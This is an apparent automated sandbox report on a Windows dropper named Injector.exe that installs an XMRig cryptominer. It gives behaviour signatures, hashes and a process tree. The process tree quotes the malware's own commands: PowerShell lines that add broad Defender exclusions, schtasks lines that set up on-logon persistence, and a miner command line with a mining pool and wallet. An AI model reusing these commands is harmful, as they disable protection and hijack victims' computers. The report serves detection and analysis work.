Analysis

  • max time kernel
    151s
  • max time network
    127s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    21-10-2021 00:00

General

  • Target

    Injector.exe

  • Size

    2.9MB

  • MD5

    b08ad9c7f95ff11da0b0b93543e35bbc

  • SHA1

    da304fbd1bb1ff500355d1cde15bada5f42afa8c

  • SHA256

    83183a8d40a911690ac0064964d07bac630a508a63a43b56fb61ed405d8d8900

  • SHA512

    64475323852be6211ddbd74c2bd42fd961f117584f7b83cfbf931bc2fb6859db313b9fe9e0f9767555417d3113fd6d95826a4c68faf3f7264a282f0ec2097a3f

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 7 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 1 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in System32 directory 7 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 57 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Injector.exe
    "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
    1⤵
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2324
    • C:\Users\Admin\AppData\Local\Temp\fl.exe
      "C:\Users\Admin\AppData\Local\Temp\fl.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1004
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1064
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1692
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1488
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start C:\Users\Admin\AppData\Local\Temp\monero-cash.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1184
        • C:\Users\Admin\AppData\Local\Temp\monero-cash.exe
          C:\Users\Admin\AppData\Local\Temp\monero-cash.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3408
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\monero-cash.exe"
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3220
            • C:\Windows\System32\cmd.exe
              "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:5072
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
                7⤵
                • Creates scheduled task(s)
                PID:2216
            • C:\Windows\System32\cmd.exe
              "cmd" cmd /c "C:\Windows\system32\services64.exe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1952
              • C:\Windows\system32\services64.exe
                C:\Windows\system32\services64.exe
                7⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2908
                • C:\Windows\System32\conhost.exe
                  "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
                  8⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:704
                  • C:\Windows\system32\Microsoft\Libs\sihost64.exe
                    "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
                    9⤵
                    • Executes dropped EXE
                    PID:4140
                    • C:\Windows\System32\conhost.exe
                      "C:\Windows\System32\conhost.exe" "/sihost64"
                      10⤵
                        PID:2364
                    • C:\Windows\System32\cmd.exe
                      C:\Windows/System32\cmd.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.supportxmr.com:5555 --user=44z5DkTXSYBfYECbt5TdQ2SUpyAQJmmGubyUsWqzcByeKwxwsWSZabZQMuE39hedNcTL15eK8kHrAeZMUdGGmHQHBzNH5db --pass=cash --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --cinit-stealth
                      9⤵
                      • Blocklisted process makes network request
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2432
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c start C:\Users\Admin\AppData\Local\Temp\turbo.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1360
          • C:\Users\Admin\AppData\Local\Temp\turbo.exe
            C:\Users\Admin\AppData\Local\Temp\turbo.exe
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:1796
            • C:\Windows\System32\conhost.exe
              "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\turbo.exe"
              5⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3488
              • C:\Windows\System32\cmd.exe
                "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "dsfsdf" /tr "C:\Windows\system32\dsfsdf.exe"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:5064
                • C:\Windows\system32\schtasks.exe
                  schtasks /create /f /sc onlogon /rl highest /tn "dsfsdf" /tr "C:\Windows\system32\dsfsdf.exe"
                  7⤵
                  • Creates scheduled task(s)
                  PID:1948
              • C:\Windows\System32\cmd.exe
                "cmd" cmd /c "C:\Windows\system32\dsfsdf.exe"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:1716
                • C:\Windows\system32\dsfsdf.exe
                  C:\Windows\system32\dsfsdf.exe
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:3444
                  • C:\Windows\System32\conhost.exe
                    "C:\Windows\System32\conhost.exe" "C:\Windows\system32\dsfsdf.exe"
                    8⤵
                    • Drops file in System32 directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:3844
                    • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                      "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                      9⤵
                      • Executes dropped EXE
                      PID:1212
                      • C:\Windows\System32\conhost.exe
                        "C:\Windows\System32\conhost.exe" "/sihost32"
                        10⤵
                          PID:1728

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

        MD5

        84f2160705ac9a032c002f966498ef74

        SHA1

        e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

        SHA256

        7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

        SHA512

        f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

        MD5

        db01a2c1c7e70b2b038edf8ad5ad9826

        SHA1

        540217c647a73bad8d8a79e3a0f3998b5abd199b

        SHA256

        413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

        SHA512

        c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        MD5

        3d93a60785ebd6758b384f9879629dfb

        SHA1

        42077489b16e5904b0351d091be659f297b776a5

        SHA256

        1301b5700c1f4b1abd4515beb380e780a3dfd85f6d66acd960f6ca43a863cd4d

        SHA512

        8f675148e1d1476802a7c0fd2d7c905047c843b350055d03bdf6f129e5e8a970a4cdf740ce94ada824b4fe096de5288bf364e4434456a00581b3c13901d0a799

      • C:\Users\Admin\AppData\Local\Temp\fl.exe

        MD5

        7adde05c5807f6eca38a7a703f32f360

        SHA1

        01c5be5525a1bf2c3dca474192e8b82331c79d56

        SHA256

        a94f4ed0091ef76e9f59ea69cfd421cb40f5d0de505b311a105eb69751ff6257

        SHA512

        4f55ffd9b717417c2e517f679f97955df8ef38c18ad5ae9097c2163587ac19a3ad4361245ffd3e7c99c0acbe06726f51e2588da0689f367de0cd87c5322abecc

      • C:\Users\Admin\AppData\Local\Temp\fl.exe

        MD5

        7adde05c5807f6eca38a7a703f32f360

        SHA1

        01c5be5525a1bf2c3dca474192e8b82331c79d56

        SHA256

        a94f4ed0091ef76e9f59ea69cfd421cb40f5d0de505b311a105eb69751ff6257

        SHA512

        4f55ffd9b717417c2e517f679f97955df8ef38c18ad5ae9097c2163587ac19a3ad4361245ffd3e7c99c0acbe06726f51e2588da0689f367de0cd87c5322abecc

      • C:\Users\Admin\AppData\Local\Temp\monero-cash.exe

        MD5

        89c11aa5a4e5dc938a37799a7d7c20f7

        SHA1

        fe1db1329fe6d1f923c240d0db792f403f9ed839

        SHA256

        8129b480cc12665fe8c774ea3fd0f778f963887c50105910b030c386640115dc

        SHA512

        bd21e5cf761aaf1e93311efe9fa2045641500940d0d95cbf1f8714c393d824b4343cf99791a2cd087f83421eb3f546ad67c35a0353f036560607fc7f6b31bff3

      • C:\Users\Admin\AppData\Local\Temp\monero-cash.exe

        MD5

        89c11aa5a4e5dc938a37799a7d7c20f7

        SHA1

        fe1db1329fe6d1f923c240d0db792f403f9ed839

        SHA256

        8129b480cc12665fe8c774ea3fd0f778f963887c50105910b030c386640115dc

        SHA512

        bd21e5cf761aaf1e93311efe9fa2045641500940d0d95cbf1f8714c393d824b4343cf99791a2cd087f83421eb3f546ad67c35a0353f036560607fc7f6b31bff3

      • C:\Users\Admin\AppData\Local\Temp\turbo.exe

        MD5

        c03cfeeeb0bc5656914420c225939360

        SHA1

        e99b605d147af24439d1b7c5ddff1c0bd2fc8f6d

        SHA256

        9728e19515e63a9b59e5501550e1660d96eea2d9f9054f767caaa60d4fa92b2c

        SHA512

        b3d948d3c80e2266c4dba9195817511e580643b210efa1646263c693d3c3795a36d851e5a41d6c3eceab2ccd812312c488114fa435b03953d084f8a39e3b55a2

      • C:\Users\Admin\AppData\Local\Temp\turbo.exe

        MD5

        c03cfeeeb0bc5656914420c225939360

        SHA1

        e99b605d147af24439d1b7c5ddff1c0bd2fc8f6d

        SHA256

        9728e19515e63a9b59e5501550e1660d96eea2d9f9054f767caaa60d4fa92b2c

        SHA512

        b3d948d3c80e2266c4dba9195817511e580643b210efa1646263c693d3c3795a36d851e5a41d6c3eceab2ccd812312c488114fa435b03953d084f8a39e3b55a2

      • C:\Windows\System32\Microsoft\Libs\sihost64.exe

        MD5

        94fca3529173a8ac3eef7e02b2854413

        SHA1

        ae5d253e863ec91cd983729a1c0a887733f96329

        SHA256

        fcdecf1a06d6631670e09d55e2a37b3a921a60093696cb82d62725d179198264

        SHA512

        8a7d7a3f0ecc425023eaecdf00bbb43707b52b40398b135ad84249b8ecc00f357f63a3902f4c49dd24e331430724b47323dfbd7ac96d6fe0c9ad35be0fdd53dc

      • C:\Windows\System32\Microsoft\Telemetry\sihost32.exe

        MD5

        ece7991cae266b9405baa6edc8ffc4f9

        SHA1

        0aa06736e9ada10623dce51b9749b9b931b2dc31

        SHA256

        9bcdb55c94ad8d5eb4a993883248cda25b177545ff54244832a092311fea5403

        SHA512

        9f510f2d5e5c86455c2845dc5a8461ac7c51372af17631d61cec19ba2d393f604bca15585e5ed37c17b9b43374568dc98c0539fec7eba0f549556ae599b98f03

      • C:\Windows\System32\dsfsdf.exe

        MD5

        c03cfeeeb0bc5656914420c225939360

        SHA1

        e99b605d147af24439d1b7c5ddff1c0bd2fc8f6d

        SHA256

        9728e19515e63a9b59e5501550e1660d96eea2d9f9054f767caaa60d4fa92b2c

        SHA512

        b3d948d3c80e2266c4dba9195817511e580643b210efa1646263c693d3c3795a36d851e5a41d6c3eceab2ccd812312c488114fa435b03953d084f8a39e3b55a2

      • C:\Windows\System32\services64.exe

        MD5

        89c11aa5a4e5dc938a37799a7d7c20f7

        SHA1

        fe1db1329fe6d1f923c240d0db792f403f9ed839

        SHA256

        8129b480cc12665fe8c774ea3fd0f778f963887c50105910b030c386640115dc

        SHA512

        bd21e5cf761aaf1e93311efe9fa2045641500940d0d95cbf1f8714c393d824b4343cf99791a2cd087f83421eb3f546ad67c35a0353f036560607fc7f6b31bff3

      • C:\Windows\system32\Microsoft\Libs\sihost64.exe

        MD5

        94fca3529173a8ac3eef7e02b2854413

        SHA1

        ae5d253e863ec91cd983729a1c0a887733f96329

        SHA256

        fcdecf1a06d6631670e09d55e2a37b3a921a60093696cb82d62725d179198264

        SHA512

        8a7d7a3f0ecc425023eaecdf00bbb43707b52b40398b135ad84249b8ecc00f357f63a3902f4c49dd24e331430724b47323dfbd7ac96d6fe0c9ad35be0fdd53dc

      • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe

        MD5

        ece7991cae266b9405baa6edc8ffc4f9

        SHA1

        0aa06736e9ada10623dce51b9749b9b931b2dc31

        SHA256

        9bcdb55c94ad8d5eb4a993883248cda25b177545ff54244832a092311fea5403

        SHA512

        9f510f2d5e5c86455c2845dc5a8461ac7c51372af17631d61cec19ba2d393f604bca15585e5ed37c17b9b43374568dc98c0539fec7eba0f549556ae599b98f03

      • C:\Windows\system32\dsfsdf.exe

        MD5

        c03cfeeeb0bc5656914420c225939360

        SHA1

        e99b605d147af24439d1b7c5ddff1c0bd2fc8f6d

        SHA256

        9728e19515e63a9b59e5501550e1660d96eea2d9f9054f767caaa60d4fa92b2c

        SHA512

        b3d948d3c80e2266c4dba9195817511e580643b210efa1646263c693d3c3795a36d851e5a41d6c3eceab2ccd812312c488114fa435b03953d084f8a39e3b55a2

      • C:\Windows\system32\services64.exe

        MD5

        89c11aa5a4e5dc938a37799a7d7c20f7

        SHA1

        fe1db1329fe6d1f923c240d0db792f403f9ed839

        SHA256

        8129b480cc12665fe8c774ea3fd0f778f963887c50105910b030c386640115dc

        SHA512

        bd21e5cf761aaf1e93311efe9fa2045641500940d0d95cbf1f8714c393d824b4343cf99791a2cd087f83421eb3f546ad67c35a0353f036560607fc7f6b31bff3

      • memory/704-727-0x0000029DB6686000-0x0000029DB6687000-memory.dmp

        Filesize

        4KB

      • memory/704-725-0x0000029DB6680000-0x0000029DB6682000-memory.dmp

        Filesize

        8KB

      • memory/704-726-0x0000029DB6683000-0x0000029DB6685000-memory.dmp

        Filesize

        8KB

      • memory/1004-134-0x0000000000000000-mapping.dmp

      • memory/1064-137-0x0000000000000000-mapping.dmp

      • memory/1184-138-0x0000000000000000-mapping.dmp

      • memory/1212-702-0x0000000000000000-mapping.dmp

      • memory/1360-139-0x0000000000000000-mapping.dmp

      • memory/1488-396-0x0000000000000000-mapping.dmp

      • memory/1488-409-0x0000000006C00000-0x0000000006C01000-memory.dmp

        Filesize

        4KB

      • memory/1488-504-0x0000000006C03000-0x0000000006C04000-memory.dmp

        Filesize

        4KB

      • memory/1488-432-0x000000007F550000-0x000000007F551000-memory.dmp

        Filesize

        4KB

      • memory/1488-410-0x0000000006C02000-0x0000000006C03000-memory.dmp

        Filesize

        4KB

      • memory/1692-152-0x0000000007E20000-0x0000000007E21000-memory.dmp

        Filesize

        4KB

      • memory/1692-179-0x0000000009950000-0x0000000009951000-memory.dmp

        Filesize

        4KB

      • memory/1692-150-0x00000000076A0000-0x00000000076A1000-memory.dmp

        Filesize

        4KB

      • memory/1692-151-0x0000000007D80000-0x0000000007D81000-memory.dmp

        Filesize

        4KB

      • memory/1692-148-0x0000000003280000-0x0000000003281000-memory.dmp

        Filesize

        4KB

      • memory/1692-154-0x00000000080F0000-0x00000000080F1000-memory.dmp

        Filesize

        4KB

      • memory/1692-156-0x0000000004D02000-0x0000000004D03000-memory.dmp

        Filesize

        4KB

      • memory/1692-155-0x0000000004D00000-0x0000000004D01000-memory.dmp

        Filesize

        4KB

      • memory/1692-157-0x0000000007FF0000-0x0000000007FF1000-memory.dmp

        Filesize

        4KB

      • memory/1692-158-0x00000000085E0000-0x00000000085E1000-memory.dmp

        Filesize

        4KB

      • memory/1692-160-0x0000000003280000-0x0000000003281000-memory.dmp

        Filesize

        4KB

      • memory/1692-167-0x0000000009580000-0x00000000095B3000-memory.dmp

        Filesize

        204KB

      • memory/1692-174-0x0000000009560000-0x0000000009561000-memory.dmp

        Filesize

        4KB

      • memory/1692-149-0x0000000004CC0000-0x0000000004CC1000-memory.dmp

        Filesize

        4KB

      • memory/1692-180-0x0000000009B00000-0x0000000009B01000-memory.dmp

        Filesize

        4KB

      • memory/1692-181-0x000000007E780000-0x000000007E781000-memory.dmp

        Filesize

        4KB

      • memory/1692-182-0x0000000004D03000-0x0000000004D04000-memory.dmp

        Filesize

        4KB

      • memory/1692-147-0x0000000003280000-0x0000000003281000-memory.dmp

        Filesize

        4KB

      • memory/1692-140-0x0000000000000000-mapping.dmp

      • memory/1716-679-0x0000000000000000-mapping.dmp

      • memory/1728-755-0x00000228FE1D6000-0x00000228FE1D7000-memory.dmp

        Filesize

        4KB

      • memory/1728-752-0x00000228FC560000-0x00000228FC566000-memory.dmp

        Filesize

        24KB

      • memory/1728-753-0x00000228FE1D0000-0x00000228FE1D2000-memory.dmp

        Filesize

        8KB

      • memory/1728-754-0x00000228FE1D3000-0x00000228FE1D5000-memory.dmp

        Filesize

        8KB

      • memory/1796-142-0x0000000000000000-mapping.dmp

      • memory/1948-677-0x0000000000000000-mapping.dmp

      • memory/1952-678-0x0000000000000000-mapping.dmp

      • memory/2216-676-0x0000000000000000-mapping.dmp

      • memory/2324-118-0x0000000000CF0000-0x0000000000CF1000-memory.dmp

        Filesize

        4KB

      • memory/2324-128-0x0000000007800000-0x0000000007801000-memory.dmp

        Filesize

        4KB

      • memory/2324-121-0x0000000006080000-0x0000000006081000-memory.dmp

        Filesize

        4KB

      • memory/2324-127-0x0000000007D30000-0x0000000007D31000-memory.dmp

        Filesize

        4KB

      • memory/2324-122-0x00000000061B0000-0x00000000061B1000-memory.dmp

        Filesize

        4KB

      • memory/2324-117-0x0000000077240000-0x00000000773CE000-memory.dmp

        Filesize

        1.6MB

      • memory/2324-133-0x0000000008420000-0x0000000008421000-memory.dmp

        Filesize

        4KB

      • memory/2324-132-0x0000000008260000-0x0000000008261000-memory.dmp

        Filesize

        4KB

      • memory/2324-131-0x0000000007900000-0x0000000007901000-memory.dmp

        Filesize

        4KB

      • memory/2324-130-0x0000000008760000-0x0000000008761000-memory.dmp

        Filesize

        4KB

      • memory/2324-126-0x0000000007630000-0x0000000007631000-memory.dmp

        Filesize

        4KB

      • memory/2324-129-0x0000000007920000-0x0000000007921000-memory.dmp

        Filesize

        4KB

      • memory/2324-125-0x0000000006150000-0x0000000006151000-memory.dmp

        Filesize

        4KB

      • memory/2324-120-0x00000000065F0000-0x00000000065F1000-memory.dmp

        Filesize

        4KB

      • memory/2324-124-0x0000000006110000-0x0000000006111000-memory.dmp

        Filesize

        4KB

      • memory/2324-123-0x0000000005FE0000-0x00000000065E6000-memory.dmp

        Filesize

        6.0MB

      • memory/2364-758-0x000002222AB70000-0x000002222AB72000-memory.dmp

        Filesize

        8KB

      • memory/2364-756-0x0000022210590000-0x0000022210596000-memory.dmp

        Filesize

        24KB

      • memory/2364-760-0x000002222AB76000-0x000002222AB77000-memory.dmp

        Filesize

        4KB

      • memory/2364-759-0x000002222AB73000-0x000002222AB75000-memory.dmp

        Filesize

        8KB

      • memory/2432-736-0x000001DF17AD0000-0x000001DF17AF0000-memory.dmp

        Filesize

        128KB

      • memory/2432-761-0x000001DF17AF0000-0x000001DF17B10000-memory.dmp

        Filesize

        128KB

      • memory/2432-733-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

      • memory/2432-762-0x000001DF17AF0000-0x000001DF17B10000-memory.dmp

        Filesize

        128KB

      • memory/2432-763-0x000001DF17B10000-0x000001DF17B30000-memory.dmp

        Filesize

        128KB

      • memory/2432-730-0x000000014030F3F8-mapping.dmp

      • memory/2908-686-0x0000000000000000-mapping.dmp

      • memory/3220-668-0x00000255BCFB0000-0x00000255BCFB2000-memory.dmp

        Filesize

        8KB

      • memory/3220-667-0x00000255BB090000-0x00000255BB2B0000-memory.dmp

        Filesize

        2.1MB

      • memory/3220-670-0x00000255BCFB3000-0x00000255BCFB5000-memory.dmp

        Filesize

        8KB

      • memory/3220-671-0x00000255BCFB6000-0x00000255BCFB7000-memory.dmp

        Filesize

        4KB

      • memory/3408-141-0x0000000000000000-mapping.dmp

      • memory/3444-683-0x0000000000000000-mapping.dmp

      • memory/3488-673-0x000001E832766000-0x000001E832767000-memory.dmp

        Filesize

        4KB

      • memory/3488-672-0x000001E832763000-0x000001E832765000-memory.dmp

        Filesize

        8KB

      • memory/3488-669-0x000001E832760000-0x000001E832762000-memory.dmp

        Filesize

        8KB

      • memory/3488-666-0x000001E817EA0000-0x000001E818091000-memory.dmp

        Filesize

        1.9MB

      • memory/3844-724-0x00000222E3D06000-0x00000222E3D07000-memory.dmp

        Filesize

        4KB

      • memory/3844-722-0x00000222E3D00000-0x00000222E3D02000-memory.dmp

        Filesize

        8KB

      • memory/3844-723-0x00000222E3D03000-0x00000222E3D05000-memory.dmp

        Filesize

        8KB

      • memory/4140-719-0x0000000000000000-mapping.dmp

      • memory/5064-675-0x0000000000000000-mapping.dmp

      • memory/5072-674-0x0000000000000000-mapping.dmp